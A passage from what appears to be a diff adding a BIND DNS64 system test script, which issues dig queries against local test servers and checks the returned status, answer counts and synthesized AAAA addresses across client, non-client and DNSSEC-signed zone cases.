$ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-existent AAAA lookup works, recursive only +norec ($n)" +ret=0 +$DIG $DIGOPTS +norec non-existent.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-excluded AAAA via CNAME lookup works, recursive only +norec ($n)" +ret=0 +$DIG $DIGOPTS +norec cname-aaaa-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded only AAAA via CNAME lookup works, recursive only +norec ($n)" +ret=0 +$DIG $DIGOPTS +norec cname-excluded-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 2," dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:eeee::3" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded AAAA and non-mapped A via CNAME lookup works, recursive only +norec ($n)" +ret=0 +$DIG $DIGOPTS +norec cname-excluded-bad-a.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 2," dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:eeee::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded only AAAA and mapped A via CNAME lookup works, recursive only +norec ($n)" +ret=0 +$DIG $DIGOPTS +norec cname-excluded-good-a.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 2," dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:eeee::1" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA only via CNAME lookup works, recursive only +norec ($n)" +ret=0 +$DIG $DIGOPTS +norec cname-aaaa-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A only via CNAME lookup works, recursive only +norec ($n)" +ret=0 +$DIG $DIGOPTS +norec cname-a-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +grep "CNAME a-only.example." dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A and AAAA via CNAME lookup works, recursive only +norec ($n)" +ret=0 +$DIG $DIGOPTS +norec cname-a-and-aaaa.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::1" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-mapped A via CNAME lookup works, recursive only +norec ($n)" +ret=0 +$DIG $DIGOPTS +norec cname-a-not-mapped.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +grep "CNAME a-not-mapped.example." dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking NODATA AAAA via CNAME lookup works, recursive only +norec ($n)" +ret=0 +$DIG $DIGOPTS +norec cname-mx-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +grep "CNAME mx-only.example." dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-existent AAAA via CNAME lookup works, recursive only +norec ($n)" +ret=0 +$DIG $DIGOPTS +norec cname-non-existent.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Check the example. domain from non client + +echo_i "checking non-excluded AAAA from non-client lookup works ($n)" +ret=0 +$DIG $DIGOPTS aaaa-only.example. @10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded only AAAA from non-client lookup works ($n)" +ret=0 +$DIG $DIGOPTS excluded-only.example. @10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:eeee::3" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded AAAA and non-mapped A from non-client lookup works ($n)" +ret=0 +$DIG $DIGOPTS excluded-bad-a.example. @10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:eeee::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded only AAAA and mapped A from non-client lookup works ($n)" +ret=0 +$DIG $DIGOPTS excluded-good-a.example. @10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:eeee::1" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA only from non-client lookup works ($n)" +ret=0 +$DIG $DIGOPTS aaaa-only.example. @10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A only from non-client lookup works ($n)" +ret=0 +$DIG $DIGOPTS a-only.example. @10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A and AAAA from non-client lookup works ($n)" +ret=0 +$DIG $DIGOPTS a-and-aaaa.example. @10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::1" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-mapped A from non-client lookup works ($n)" +ret=0 +$DIG $DIGOPTS a-not-mapped.example. @10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking NODATA AAAA from non-client lookup works ($n)" +ret=0 +$DIG $DIGOPTS mx-only.example. @10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-existent AAAA from non-client lookup works ($n)" +ret=0 +$DIG $DIGOPTS non-existent.example. @10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-excluded AAAA via CNAME from non-client lookup works ($n)" +ret=0 +$DIG $DIGOPTS cname-aaaa-only.example. @10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded only AAAA via CNAME from non-client lookup works ($n)" +ret=0 +$DIG $DIGOPTS cname-excluded-only.example. @10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:eeee::3" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded AAAA and non-mapped A via CNAME from non-client lookup works ($n)" +ret=0 +$DIG $DIGOPTS cname-excluded-bad-a.example. @10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:eeee::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded only AAAA and mapped A via CNAME from non-client lookup works ($n)" +ret=0 +$DIG $DIGOPTS cname-excluded-good-a.example. @10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:eeee::1" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA only via CNAME from non-client lookup works ($n)" +ret=0 +$DIG $DIGOPTS cname-aaaa-only.example. @10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A only via CNAME from non-client lookup works ($n)" +ret=0 +$DIG $DIGOPTS cname-a-only.example. @10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A and AAAA via CNAME from non-client lookup works ($n)" +ret=0 +$DIG $DIGOPTS cname-a-and-aaaa.example. @10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::1" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-mapped A via CNAME from non-client lookup works ($n)" +ret=0 +$DIG $DIGOPTS cname-a-not-mapped.example. @10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +grep "CNAME a-not-mapped.example." dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking NODATA AAAA via CNAME from non-client lookup works ($n)" +ret=0 +$DIG $DIGOPTS cname-mx-only.example. @10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +grep "CNAME mx-only.example." dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-existent AAAA via CNAME from non-client lookup works ($n)" +ret=0 +$DIG $DIGOPTS cname-non-existent.example. @10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Check the signed. domain + +echo_i "checking non-excluded AAAA lookup is signed zone works ($n)" +ret=0 +$DIG $DIGOPTS aaaa-only.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded only AAAA lookup is signed zone works ($n)" +ret=0 +$DIG $DIGOPTS excluded-only.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded AAAA and non-mapped A lookup is signed zone works ($n)" +ret=0 +$DIG $DIGOPTS excluded-bad-a.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded only AAAA and mapped A lookup is signed zone works ($n)" +ret=0 +$DIG $DIGOPTS excluded-good-a.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:aaaa::102:304" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA only lookup is signed zone works ($n)" +ret=0 +$DIG $DIGOPTS aaaa-only.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A only lookup is signed zone works ($n)" +ret=0 +$DIG $DIGOPTS a-only.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:aaaa::102:305" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A and AAAA lookup is signed zone works ($n)" +ret=0 +$DIG $DIGOPTS a-and-aaaa.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::1" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-mapped A lookup is signed zone works ($n)" +ret=0 +$DIG $DIGOPTS a-not-mapped.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking NODATA AAAA lookup is signed zone works ($n)" +ret=0 +$DIG $DIGOPTS mx-only.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-existent AAAA lookup is signed zone works ($n)" +ret=0 +$DIG $DIGOPTS non-existent.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-excluded AAAA via CNAME lookup is signed zone works ($n)" +ret=0 +$DIG $DIGOPTS cname-aaaa-only.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded only AAAA via CNAME lookup is signed zone works ($n)" +ret=0 +$DIG $DIGOPTS cname-excluded-only.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded AAAA and non-mapped A via CNAME lookup is signed zone works ($n)" +ret=0 +$DIG $DIGOPTS cname-excluded-bad-a.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded only AAAA and mapped A via CNAME lookup is signed zone works ($n)" +ret=0 +$DIG $DIGOPTS cname-excluded-good-a.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:aaaa::102:304" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA only via CNAME lookup is signed zone works ($n)" +ret=0 +$DIG $DIGOPTS cname-aaaa-only.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A only via CNAME lookup is signed zone works ($n)" +ret=0 +$DIG $DIGOPTS cname-a-only.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:aaaa::102:305" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A and AAAA via CNAME lookup is signed zone works ($n)" +ret=0 +$DIG $DIGOPTS cname-a-and-aaaa.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::1" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-mapped A via CNAME lookup is signed zone works ($n)" +ret=0 +$DIG $DIGOPTS cname-a-not-mapped.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +grep "CNAME a-not-mapped.signed." dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking NODATA AAAA via CNAME lookup is signed zone works ($n)" +ret=0 +$DIG $DIGOPTS cname-mx-only.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +grep "CNAME mx-only.signed." dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-existent AAAA via CNAME lookup is signed zone works ($n)" +ret=0 +$DIG $DIGOPTS cname-non-existent.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Check the signed. domain +echo_i "checking non-excluded AAAA lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec aaaa-only.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded only AAAA lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec excluded-only.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:eeee::3" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded AAAA and non-mapped A lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec excluded-bad-a.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:eeee::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded only AAAA and mapped A lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec excluded-good-a.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:eeee::1" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA only lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec aaaa-only.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A only lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec a-only.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A and AAAA lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec a-and-aaaa.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::1" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-mapped A lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec a-not-mapped.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking NODATA AAAA lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec mx-only.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-existent AAAA lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec non-existent.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-excluded AAAA via CNAME lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec cname-aaaa-only.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded only AAAA via CNAME lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec cname-excluded-only.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:eeee::3" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded AAAA and non-mapped A via CNAME lookup is signed zone works with +dnssec 